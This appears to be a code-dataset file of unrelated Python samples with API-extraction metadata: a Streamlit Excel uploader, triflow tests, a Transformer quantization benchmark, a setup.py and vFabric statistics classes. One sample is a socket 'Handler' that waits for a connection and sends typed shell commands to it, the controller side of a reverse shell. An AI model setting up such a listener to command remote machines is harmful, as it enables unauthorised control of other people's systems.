"normalizedDistance.getDistanceBetweenSamples",
"recourse.builder.ActionSet",
"pandas.Series",
"numpy.add",
"recourse.builder.RecourseBuilder",
"numpy.round"
] |
[((282, 293), 'time.time', 'time.time', ([], {}), '()\n', (291, 293), False, 'import time\n'), ((1428, 1471), 'recourse.builder.ActionSet', 'ActionSet', ([], {'X': 'X', 'custom_bounds': 'custom_bounds'}), '(X=X, custom_bounds=custom_bounds)\n', (1437, 1471), False, 'from recourse.builder import ActionSet\n'), ((2692, 2860), 'recourse.builder.RecourseBuilder', 'RecourseBuilder', ([], {'optimizer': '"""cplex"""', 'coefficients': 'coefficients', 'intercept': 'intercept', 'action_set': 'action_set', 'x': 'factual_sample_values', 'mip_cost_type': 'mip_cost_type'}), "(optimizer='cplex', coefficients=coefficients, intercept=\n intercept, action_set=action_set, x=factual_sample_values,\n mip_cost_type=mip_cost_type)\n", (2707, 2860), False, 'from recourse.builder import RecourseBuilder\n'), ((2986, 3034), 'numpy.add', 'np.add', (['factual_sample_values', "output['actions']"], {}), "(factual_sample_values, output['actions'])\n", (2992, 3034), True, 'import numpy as np\n'), ((6797, 6908), 'normalizedDistance.getDistanceBetweenSamples', 'normalizedDistance.getDistanceBetweenSamples', (['factual_sample', 'counterfactual_sample', 'norm_type', 'dataset_obj'], {}), '(factual_sample,\n counterfactual_sample, norm_type, dataset_obj)\n', (6841, 6908), False, 'import normalizedDistance\n'), ((7628, 7639), 'time.time', 'time.time', ([], {}), '()\n', (7637, 7639), False, 'import time\n'), ((1050, 1071), 'pandas.Series', 'pd.Series', (['sample_row'], {}), '(sample_row)\n', (1059, 1071), True, 'import pandas as pd\n'), ((3774, 3821), 'numpy.round', 'np.round', (['counterfactual_sample[attr_name_kurz]'], {}), '(counterfactual_sample[attr_name_kurz])\n', (3782, 3821), True, 'import numpy as np\n'), ((4568, 4600), 'numpy.sum', 'np.sum', (['activations_for_category'], {}), '(activations_for_category)\n', (4574, 4600), True, 'import numpy as np\n'), ((3672, 3719), 'numpy.round', 'np.round', (['counterfactual_sample[attr_name_kurz]'], {}), '(counterfactual_sample[attr_name_kurz])\n', (3680, 3719), True, 'import numpy as np\n')]
|
import streamlit as st
from code import helpers
import pandas as pd
st.title("Datos")
st.markdown("Cargue un archivo de datos en formato Fishtalk para su procesamiento.")
c1, c2, c3 = st.columns([3,1,3])
# Upload button
upload_text = "Cargar archivo"
uploaded_file = c1.file_uploader(upload_text)
# Work and use a progress bar
if uploaded_file:
# Save the file
input_excel_filepath = "xlsx_data/" + uploaded_file.name
with open(input_excel_filepath, "wb") as f:
f.write(uploaded_file.read())
# Download the processed file
info_box = st.empty()
with st.spinner():
info_box.info("Procesando archivo...")
output_excel_filepath = helpers.clean_file(input_excel_filepath)
info_box.empty()
c3.markdown("\n")
c3.markdown("Descargar versión procesada")
filename = output_excel_filepath.split("/")[-1]
with open(output_excel_filepath, "rb") as fh:
btn = c3.download_button(
label="Download file",
data=fh,
file_name=filename,
)
# Load the data into a dataframe
st.session_state.df = pd.read_excel(output_excel_filepath)
st.info("Archivo cargado y listo para visualizar.")
|
[
"streamlit.markdown",
"streamlit.columns",
"streamlit.spinner",
"streamlit.title",
"code.helpers.clean_file",
"pandas.read_excel",
"streamlit.info",
"streamlit.empty"
] |
[((70, 87), 'streamlit.title', 'st.title', (['"""Datos"""'], {}), "('Datos')\n", (78, 87), True, 'import streamlit as st\n'), ((89, 178), 'streamlit.markdown', 'st.markdown', (['"""Cargue un archivo de datos en formato Fishtalk para su procesamiento."""'], {}), "(\n 'Cargue un archivo de datos en formato Fishtalk para su procesamiento.')\n", (100, 178), True, 'import streamlit as st\n'), ((188, 209), 'streamlit.columns', 'st.columns', (['[3, 1, 3]'], {}), '([3, 1, 3])\n', (198, 209), True, 'import streamlit as st\n'), ((568, 578), 'streamlit.empty', 'st.empty', ([], {}), '()\n', (576, 578), True, 'import streamlit as st\n'), ((1130, 1166), 'pandas.read_excel', 'pd.read_excel', (['output_excel_filepath'], {}), '(output_excel_filepath)\n', (1143, 1166), True, 'import pandas as pd\n'), ((1171, 1222), 'streamlit.info', 'st.info', (['"""Archivo cargado y listo para visualizar."""'], {}), "('Archivo cargado y listo para visualizar.')\n", (1178, 1222), True, 'import streamlit as st\n'), ((588, 600), 'streamlit.spinner', 'st.spinner', ([], {}), '()\n', (598, 600), True, 'import streamlit as st\n'), ((681, 721), 'code.helpers.clean_file', 'helpers.clean_file', (['input_excel_filepath'], {}), '(input_excel_filepath)\n', (699, 721), False, 'from code import helpers\n')]
|
import socket
import threading
import time
import logging
class Handler(threading.Thread):
def __init__(self, port):
threading.Thread.__init__(self)
logging.info(f"Handler listening on 0.0.0.0:{port}")
self.connected = False
self.port = int(port)
def run(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(('', self.port))
while True:
self.socket.listen(5)
self.client, address = self.socket.accept()
print(f"Handler> New session from {address[0]}")
self.connected = True
response = self.client.recv(255)
while response != b"":
print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='')
response = self.client.recv(255)
def listen_command(self):
if self.connected == True:
cmd = input("Shell> $ ")
if cmd == "exit":
self.kill()
print("BYE !")
exit()
self.send_command(cmd+"\n\n")
def send_command(self, cmd):
self.client.sendall(cmd.encode())
def kill(self):
self.client.close()
self.socket.close()
|
[
"logging.info",
"threading.Thread.__init__",
"socket.socket"
] |
[((131, 162), 'threading.Thread.__init__', 'threading.Thread.__init__', (['self'], {}), '(self)\n', (156, 162), False, 'import threading\n'), ((171, 223), 'logging.info', 'logging.info', (['f"""Handler listening on 0.0.0.0:{port}"""'], {}), "(f'Handler listening on 0.0.0.0:{port}')\n", (183, 223), False, 'import logging\n'), ((327, 376), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (340, 376), False, 'import socket\n')]
|
#!/usr/bin/env python
# coding=utf8
import os
import matplotlib as mpl
import numpy as np
import path
import pytest
from triflow import Model, Simulation, display_fields, display_probe # noqa
if os.environ.get('DISPLAY', '') == '':
print('no display found. Using non-interactive Agg backend')
mpl.use('Agg')
@pytest.fixture
def heat_model():
model = Model(differential_equations="k * dxxT",
dependent_variables="T",
parameters="k", compiler="numpy")
return model
@pytest.fixture
def simul(heat_model):
x, dx = np.linspace(0, 10, 50, retstep=True, endpoint=False)
T = np.cos(x * 2 * np.pi / 10)
initial_fields = heat_model.fields_template(x=x, T=T)
parameters = dict(periodic=True, k=1)
simul = Simulation(heat_model, initial_fields, parameters,
dt=.5, tmax=2, tol=1E-1)
return simul
def test_display_fields(simul):
display_fields(simul)
simul.run()
def test_display_probes(simul):
display_probe(simul, function=lambda simul: simul.timer.total)
simul.run()
def test_display_mul(simul):
display_fields(simul) * display_fields(simul)
display_fields(simul) * display_fields(simul).hv_curve
def test_display_add(simul):
display_fields(simul) + display_fields(simul)
display_fields(simul) + display_fields(simul).hv_curve
@pytest.mark.parametrize("fmt",
["png", "svg", "pdf"])
def test_display_fields_on_disk(simul, fmt):
with path.tempdir() as d:
display = display_fields(simul, on_disk=d, fmt=fmt)
simul.run()
[process.join() for process in display._writers]
assert len(d.glob("*.%s" % fmt)) == 5
@pytest.mark.parametrize("fmt",
["png", "svg", "pdf"])
def test_display_probles_on_disk(simul, fmt):
with path.tempdir() as d:
display = display_probe(simul,
function=lambda simul: simul.timer.total,
on_disk=d, fmt=fmt)
simul.run()
[process.join() for process in display._writers]
assert len(d.glob("*.%s" % fmt)) == 5
def test_display_api(simul):
display = display_fields(simul)
display.hv_curve
|
[
"triflow.Model",
"triflow.display_probe",
"path.tempdir",
"os.environ.get",
"triflow.display_fields",
"matplotlib.use",
"triflow.Simulation",
"numpy.linspace",
"numpy.cos",
"pytest.mark.parametrize"
] |
[((1367, 1420), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""fmt"""', "['png', 'svg', 'pdf']"], {}), "('fmt', ['png', 'svg', 'pdf'])\n", (1390, 1420), False, 'import pytest\n'), ((1707, 1760), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""fmt"""', "['png', 'svg', 'pdf']"], {}), "('fmt', ['png', 'svg', 'pdf'])\n", (1730, 1760), False, 'import pytest\n'), ((200, 229), 'os.environ.get', 'os.environ.get', (['"""DISPLAY"""', '""""""'], {}), "('DISPLAY', '')\n", (214, 229), False, 'import os\n'), ((306, 320), 'matplotlib.use', 'mpl.use', (['"""Agg"""'], {}), "('Agg')\n", (313, 320), True, 'import matplotlib as mpl\n'), ((369, 472), 'triflow.Model', 'Model', ([], {'differential_equations': '"""k * dxxT"""', 'dependent_variables': '"""T"""', 'parameters': '"""k"""', 'compiler': '"""numpy"""'}), "(differential_equations='k * dxxT', dependent_variables='T',\n parameters='k', compiler='numpy')\n", (374, 472), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((575, 627), 'numpy.linspace', 'np.linspace', (['(0)', '(10)', '(50)'], {'retstep': '(True)', 'endpoint': '(False)'}), '(0, 10, 50, retstep=True, endpoint=False)\n', (586, 627), True, 'import numpy as np\n'), ((636, 662), 'numpy.cos', 'np.cos', (['(x * 2 * np.pi / 10)'], {}), '(x * 2 * np.pi / 10)\n', (642, 662), True, 'import numpy as np\n'), ((775, 850), 'triflow.Simulation', 'Simulation', (['heat_model', 'initial_fields', 'parameters'], {'dt': '(0.5)', 'tmax': '(2)', 'tol': '(0.1)'}), '(heat_model, initial_fields, parameters, dt=0.5, tmax=2, tol=0.1)\n', (785, 850), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((929, 950), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (943, 950), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1005, 1067), 'triflow.display_probe', 'display_probe', (['simul'], {'function': '(lambda simul: simul.timer.total)'}), '(simul, function=lambda simul: simul.timer.total)\n', (1018, 1067), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((2195, 2216), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (2209, 2216), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1119, 1140), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1133, 1140), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1143, 1164), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1157, 1164), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1169, 1190), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1183, 1190), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1259, 1280), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1273, 1280), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1283, 1304), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1297, 1304), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1309, 1330), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1323, 1330), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1500, 1514), 'path.tempdir', 'path.tempdir', ([], {}), '()\n', (1512, 1514), False, 'import path\n'), ((1539, 1580), 'triflow.display_fields', 'display_fields', (['simul'], {'on_disk': 'd', 'fmt': 'fmt'}), '(simul, on_disk=d, fmt=fmt)\n', (1553, 1580), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1841, 1855), 'path.tempdir', 'path.tempdir', ([], {}), '()\n', (1853, 1855), False, 'import path\n'), ((1880, 1966), 'triflow.display_probe', 'display_probe', (['simul'], {'function': '(lambda simul: simul.timer.total)', 'on_disk': 'd', 'fmt': 'fmt'}), '(simul, function=lambda simul: simul.timer.total, on_disk=d,\n fmt=fmt)\n', (1893, 1966), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1193, 1214), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1207, 1214), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1333, 1354), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1347, 1354), False, 'from triflow import Model, Simulation, display_fields, display_probe\n')]
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import time
import sys
import numpy as np
import unicodedata
import six
import re
import tensorflow as tf
from absl import app
from argparse import ArgumentParser
import pandas as pd
from utils import tokenizer
from utils.tokenizer import Subtokenizer
from utils import metrics
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_integer("batch_size", 64,
"run batch size")
flags.DEFINE_string("input_graph", None,
"The path of input model file.")
flags.DEFINE_string("inputs_file", None,
"File saved to an output file.")
flags.DEFINE_string("reference_file", None,
"File containing reference translation.")
flags.DEFINE_string("vocab_file", None,
"Path to subtoken vocabulary file.")
flags.DEFINE_string("config", None,
"Config json file")
flags.DEFINE_string("output_model", None,
"The output model of the quantized model.")
flags.DEFINE_string("mode", "tune",
"One of three options: 'benchmark'/'accuracy'/'tune'.")
flags.DEFINE_integer("iters", -1,
"The iteration used for benchmark.")
class UnicodeRegex(object):
def __init__(self):
punctuation = self.property_chars("P")
self.nondigit_punct_re = re.compile(r"([^\d])([" + punctuation + r"])")
self.punct_nondigit_re = re.compile(r"([" + punctuation + r"])([^\d])")
self.symbol_re = re.compile("([" + self.property_chars("S") + "])")
def property_chars(self, prefix):
return "".join(six.unichr(x) for x in range(sys.maxunicode)
if unicodedata.category(six.unichr(x)).startswith(prefix))
uregex = UnicodeRegex()
def bleu_tokenize(string):
string = uregex.nondigit_punct_re.sub(r"\1 \2 ", string)
string = uregex.punct_nondigit_re.sub(r" \1 \2", string)
string = uregex.symbol_re.sub(r" \1 ", string)
return string.split()
class bleu(object):
def __init__(self):
self.translations = []
self.labels = []
def reset(self):
self.translations = []
self.labels = []
def update(self, pred, label):
if len(label) != len(pred):
raise ValueError("Reference and translation files have different number "
"of lines. If training only a few steps (100-200), the "
"translation may be empty.")
label = [x.lower() for x in label]
pred = [x.lower() for x in pred]
label = [bleu_tokenize(x) for x in label]
pred = [bleu_tokenize(x) for x in pred]
self.labels.extend(label)
self.translations.extend(pred)
def result(self):
return metrics.compute_bleu(self.labels, self.translations) * 100
def collate_fn(batch):
"""Puts each data field into a pd frame with outer dimension batch size"""
elem = batch[0]
if isinstance(elem, tuple):
batch = zip(*batch)
return [collate_fn(samples) for samples in batch]
elif isinstance(elem, np.ndarray):
return [list(elem) for elem in batch]
elif isinstance(elem, str):
return batch
else:
return pd.DataFrame(batch).fillna(0).values.astype(np.int32)
def load_graph(file_name):
tf.compat.v1.logging.info('Loading graph from: ' + file_name)
with tf.io.gfile.GFile(file_name, "rb") as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(graph_def, name='')
return graph
def eval_func(infer_graph, iteration=-1):
if isinstance(infer_graph, tf.compat.v1.GraphDef):
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(infer_graph, name='')
infer_graph = graph
subtokenizer = Subtokenizer(FLAGS.vocab_file)
input_tensor = infer_graph.get_tensor_by_name('input_tensor:0')
output_tensor = infer_graph.get_tensor_by_name(\
'model/Transformer/strided_slice_19:0')
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
from neural_compressor.data import DATALOADERS
dataloader = DATALOADERS['tensorflow'](ds, batch_size=FLAGS.batch_size,
collate_fn=collate_fn)
config = tf.compat.v1.ConfigProto()
config.use_per_session_threads = 1
config.inter_op_parallelism_threads = 1
sess = tf.compat.v1.Session(graph=infer_graph, config=config)
time_list = []
bleu_eval = bleu()
predictions = []
labels = []
warmup = 10
if iteration != -1:
assert iteration >= warmup, 'iteration must be larger than warmup'
for idx, (input_data, label) in enumerate(dataloader):
if idx < iteration or iteration == -1:
time_start = time.time()
out = sess.run([output_tensor], {input_tensor: input_data})
duration = time.time() - time_start
time_list.append(duration)
predictions.append(out)
labels.extend(label)
else:
break
latency = np.array(time_list[warmup: ]).mean() / FLAGS.batch_size
print('Batch size = {}'.format(FLAGS.batch_size))
print('Latency: {:.3f} ms'.format(latency * 1000))
print('Throughput: {:.3f} items/sec'.format(1./ latency))
# only calculate accuracy when running out all predictions
if iteration == -1:
decode = []
for i,tr in enumerate(predictions):
for j,itr in enumerate(tr):
for k, otr in enumerate(itr):
try:
index = list(otr).index(tokenizer.EOS_ID)
decode.append(subtokenizer.decode(otr[:index]))
except:
decode.append(subtokenizer.decode(otr))
bleu_eval.update(decode, labels)
print('Accuracy is {:.3f}'.format(bleu_eval.result()))
return bleu_eval.result()
class Dataset(object):
def __init__(self, inputs_file, reference_file, vocab_file):
with tf.io.gfile.GFile(inputs_file) as f:
records = f.read().split("\n")
inputs = [record.strip() for record in records]
if not inputs[-1]:
inputs.pop()
self.ref_lines = tokenizer.native_to_unicode(
tf.io.gfile.GFile(reference_file).read()).strip().splitlines()
subtokenizer = Subtokenizer(vocab_file)
self.batch = []
token_lens=[]
for i, line in enumerate(inputs):
enc = subtokenizer.encode(line, add_eos=True)
token_lens.append((i, len(enc)))
sorted_by_token_input_lens = sorted(token_lens, key=lambda x: x[1], reverse=True)
sorted_inputs = [None] * len(sorted_by_token_input_lens)
sorted_keys = [0] * len(sorted_by_token_input_lens)
lines = []
for i, (index, _) in enumerate(sorted_by_token_input_lens):
sorted_inputs[i] = inputs[index]
sorted_keys[index] = i
enc=subtokenizer.encode(sorted_inputs[i], add_eos=True)
lines.append([enc])
for i in sorted_keys:
self.batch.append(lines[i])
def __getitem__(self, index):
data = self.batch[index]
label = self.ref_lines[index]
return data[0], label
def __len__(self):
return len(self.batch)
def main(_):
graph = load_graph(FLAGS.input_graph)
if FLAGS.mode == 'tune':
from neural_compressor.experimental import Quantization, common
quantizer = Quantization(FLAGS.config)
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
quantizer.calib_dataloader = common.DataLoader(ds, collate_fn=collate_fn, \
batch_size=FLAGS.batch_size)
quantizer.model = common.Model(graph)
quantizer.eval_func = eval_func
q_model = quantizer.fit()
try:
q_model.save(FLAGS.output_model)
except Exception as e:
print("Failed to save model due to {}".format(str(e)))
elif FLAGS.mode == 'benchmark':
eval_func(graph, FLAGS.iters)
elif FLAGS.mode == 'accuracy':
eval_func(graph, -1)
if __name__ == "__main__":
tf.compat.v1.app.run()
|
[
"pandas.DataFrame",
"neural_compressor.experimental.Quantization",
"tensorflow.io.gfile.GFile",
"utils.tokenizer.Subtokenizer",
"six.unichr",
"tensorflow.compat.v1.logging.info",
"time.time",
"tensorflow.compat.v1.Session",
"neural_compressor.experimental.common.Model",
"numpy.array",
"tensorflow.compat.v1.ConfigProto",
"tensorflow.Graph",
"utils.metrics.compute_bleu",
"tensorflow.import_graph_def",
"tensorflow.compat.v1.GraphDef",
"neural_compressor.experimental.common.DataLoader",
"tensorflow.compat.v1.app.run",
"re.compile"
] |
[((3905, 3966), 'tensorflow.compat.v1.logging.info', 'tf.compat.v1.logging.info', (["('Loading graph from: ' + file_name)"], {}), "('Loading graph from: ' + file_name)\n", (3930, 3966), True, 'import tensorflow as tf\n'), ((4475, 4505), 'utils.tokenizer.Subtokenizer', 'Subtokenizer', (['FLAGS.vocab_file'], {}), '(FLAGS.vocab_file)\n', (4487, 4505), False, 'from utils.tokenizer import Subtokenizer\n'), ((4958, 4984), 'tensorflow.compat.v1.ConfigProto', 'tf.compat.v1.ConfigProto', ([], {}), '()\n', (4982, 4984), True, 'import tensorflow as tf\n'), ((5079, 5133), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'graph': 'infer_graph', 'config': 'config'}), '(graph=infer_graph, config=config)\n', (5099, 5133), True, 'import tensorflow as tf\n'), ((8950, 8972), 'tensorflow.compat.v1.app.run', 'tf.compat.v1.app.run', ([], {}), '()\n', (8970, 8972), True, 'import tensorflow as tf\n'), ((1941, 1986), 're.compile', 're.compile', (["('([^\\\\d])([' + punctuation + '])')"], {}), "('([^\\\\d])([' + punctuation + '])')\n", (1951, 1986), False, 'import re\n'), ((2021, 2066), 're.compile', 're.compile', (["('([' + punctuation + '])([^\\\\d])')"], {}), "('([' + punctuation + '])([^\\\\d])')\n", (2031, 2066), False, 'import re\n'), ((3976, 4010), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['file_name', '"""rb"""'], {}), "(file_name, 'rb')\n", (3993, 4010), True, 'import tensorflow as tf\n'), ((4037, 4060), 'tensorflow.compat.v1.GraphDef', 'tf.compat.v1.GraphDef', ([], {}), '()\n', (4058, 4060), True, 'import tensorflow as tf\n'), ((4156, 4195), 'tensorflow.import_graph_def', 'tf.import_graph_def', (['graph_def'], {'name': '""""""'}), "(graph_def, name='')\n", (4175, 4195), True, 'import tensorflow as tf\n'), ((4327, 4337), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (4335, 4337), True, 'import tensorflow as tf\n'), ((7076, 7100), 'utils.tokenizer.Subtokenizer', 'Subtokenizer', (['vocab_file'], {}), '(vocab_file)\n', (7088, 7100), False, 'from utils.tokenizer import Subtokenizer\n'), ((8227, 8253), 'neural_compressor.experimental.Quantization', 'Quantization', (['FLAGS.config'], {}), '(FLAGS.config)\n', (8239, 8253), False, 'from neural_compressor.experimental import Quantization, common\n'), ((8371, 8444), 'neural_compressor.experimental.common.DataLoader', 'common.DataLoader', (['ds'], {'collate_fn': 'collate_fn', 'batch_size': 'FLAGS.batch_size'}), '(ds, collate_fn=collate_fn, batch_size=FLAGS.batch_size)\n', (8388, 8444), False, 'from neural_compressor.experimental import Quantization, common\n'), ((8522, 8541), 'neural_compressor.experimental.common.Model', 'common.Model', (['graph'], {}), '(graph)\n', (8534, 8541), False, 'from neural_compressor.experimental import Quantization, common\n'), ((3356, 3408), 'utils.metrics.compute_bleu', 'metrics.compute_bleu', (['self.labels', 'self.translations'], {}), '(self.labels, self.translations)\n', (3376, 3408), False, 'from utils import metrics\n'), ((4384, 4425), 'tensorflow.import_graph_def', 'tf.import_graph_def', (['infer_graph'], {'name': '""""""'}), "(infer_graph, name='')\n", (4403, 4425), True, 'import tensorflow as tf\n'), ((5459, 5470), 'time.time', 'time.time', ([], {}), '()\n', (5468, 5470), False, 'import time\n'), ((6710, 6740), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['inputs_file'], {}), '(inputs_file)\n', (6727, 6740), True, 'import tensorflow as tf\n'), ((2206, 2219), 'six.unichr', 'six.unichr', (['x'], {}), '(x)\n', (2216, 2219), False, 'import six\n'), ((4114, 4124), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (4122, 4124), True, 'import tensorflow as tf\n'), ((5566, 5577), 'time.time', 'time.time', ([], {}), '()\n', (5575, 5577), False, 'import time\n'), ((5745, 5773), 'numpy.array', 'np.array', (['time_list[warmup:]'], {}), '(time_list[warmup:])\n', (5753, 5773), True, 'import numpy as np\n'), ((2295, 2308), 'six.unichr', 'six.unichr', (['x'], {}), '(x)\n', (2305, 2308), False, 'import six\n'), ((3819, 3838), 'pandas.DataFrame', 'pd.DataFrame', (['batch'], {}), '(batch)\n', (3831, 3838), True, 'import pandas as pd\n'), ((6981, 7014), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['reference_file'], {}), '(reference_file)\n', (6998, 7014), True, 'import tensorflow as tf\n')]
|
from distutils.core import setup
setup(
name = 'Esse3Api',
packages = ['Esse3Api'],
version = '1.1',
license = 'MIT',
description = 'A python library to query and interact with Cineca\'s ESSE3 REST API',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/LorenzoLeonardini/Esse3Api',
download_url = 'https://github.com/LorenzoLeonardini/Esse3Api/archive/v1.1.tar.gz',
keywords = ['CINECA', 'ESSE3', 'UNIVERSITY'],
install_requires = [
'requests',
],
classifiers = [
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
|
[
"distutils.core.setup"
] |
[((33, 838), 'distutils.core.setup', 'setup', ([], {'name': '"""Esse3Api"""', 'packages': "['Esse3Api']", 'version': '"""1.1"""', 'license': '"""MIT"""', 'description': '"""A python library to query and interact with Cineca\'s ESSE3 REST API"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/LorenzoLeonardini/Esse3Api"""', 'download_url': '"""https://github.com/LorenzoLeonardini/Esse3Api/archive/v1.1.tar.gz"""', 'keywords': "['CINECA', 'ESSE3', 'UNIVERSITY']", 'install_requires': "['requests']", 'classifiers': "['Development Status :: 3 - Alpha', 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6']"}), '(name=\'Esse3Api\', packages=[\'Esse3Api\'], version=\'1.1\', license=\'MIT\',\n description=\n "A python library to query and interact with Cineca\'s ESSE3 REST API",\n author=\'<NAME>\', author_email=\'<EMAIL>\', url=\n \'https://github.com/LorenzoLeonardini/Esse3Api\', download_url=\n \'https://github.com/LorenzoLeonardini/Esse3Api/archive/v1.1.tar.gz\',\n keywords=[\'CINECA\', \'ESSE3\', \'UNIVERSITY\'], install_requires=[\n \'requests\'], classifiers=[\'Development Status :: 3 - Alpha\',\n \'Intended Audience :: Developers\',\n \'Topic :: Software Development :: Build Tools\',\n \'License :: OSI Approved :: MIT License\',\n \'Programming Language :: Python :: 3\',\n \'Programming Language :: Python :: 3.4\',\n \'Programming Language :: Python :: 3.5\',\n \'Programming Language :: Python :: 3.6\'])\n', (38, 838), False, 'from distutils.core import setup\n')]
|
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
from vas.util.LinkUtils import LinkUtils
class Statistics(MutableCollection):
"""Used to enumerate and delete a cache server's statistics
:ivar `vas.shared.Security.Security` security: The resource's security
"""
def __init__(self, client, location):
super(Statistics, self).__init__(client, location, 'statistics', Statistic)
class Statistic(Resource, Deletable):
"""A statistic of a cache server
:ivar str content: The statistic's content
:ivar `vas.gemfire.CacheServerNodeInstances.CacheServerNodeInstance` instance: The statistic's cache server
node instance
:ivar `datetime.datetime` last_modified: The last modified stamp of
the statistic
:ivar str path: the path of the statistic
:ivar `vas.shared.Security.Security` security: The resource's security
:ivar int size: The size of the statistic
"""
__instance = None
@property
def content(self):
return self._client.get(self.__content_location)
@property
def instance(self):
self.__instance = self.__instance or CacheServerNodeInstance(self._client, self.__instance_location)
return self.__instance
@property
def last_modified(self):
return self.__last_modified
@property
def path(self):
return self.__path
@property
def size(self):
return self.__size
def __init__(self, client, location):
super(Statistic, self).__init__(client, location)
self.__path = self._details['path']
self.__instance_location = LinkUtils.get_link_href(self._details, 'cache-server-node-instance')
self.__content_location = LinkUtils.get_link_href(self._details, 'content')
def reload(self):
super(Statistic, self).reload()
self.__last_modified = datetime.utcfromtimestamp(self._details['last-modified'])
self.__size = self._details['size']
def __str__(self):
return "<{} path={} size={} last_modified={}>".format(self.__class__.__name__, self.__path, self.__size,
self.__last_modified)
from vas.gemfire.CacheServerNodeInstances import CacheServerNodeInstance
|
[
"datetime.datetime.utcfromtimestamp",
"vas.gemfire.CacheServerNodeInstances.CacheServerNodeInstance",
"vas.util.LinkUtils.LinkUtils.get_link_href"
] |
[((2861, 2929), 'vas.util.LinkUtils.LinkUtils.get_link_href', 'LinkUtils.get_link_href', (['self._details', '"""cache-server-node-instance"""'], {}), "(self._details, 'cache-server-node-instance')\n", (2884, 2929), False, 'from vas.util.LinkUtils import LinkUtils\n'), ((2964, 3013), 'vas.util.LinkUtils.LinkUtils.get_link_href', 'LinkUtils.get_link_href', (['self._details', '"""content"""'], {}), "(self._details, 'content')\n", (2987, 3013), False, 'from vas.util.LinkUtils import LinkUtils\n'), ((3109, 3166), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (["self._details['last-modified']"], {}), "(self._details['last-modified'])\n", (3134, 3166), False, 'from datetime import datetime\n'), ((2380, 2443), 'vas.gemfire.CacheServerNodeInstances.CacheServerNodeInstance', 'CacheServerNodeInstance', (['self._client', 'self.__instance_location'], {}), '(self._client, self.__instance_location)\n', (2403, 2443), False, 'from vas.gemfire.CacheServerNodeInstances import CacheServerNodeInstance\n')]
|
# from app.main.models.ChallengesModel import ChallengesModel
from ..models.AttemptsModel import AttemptsModel
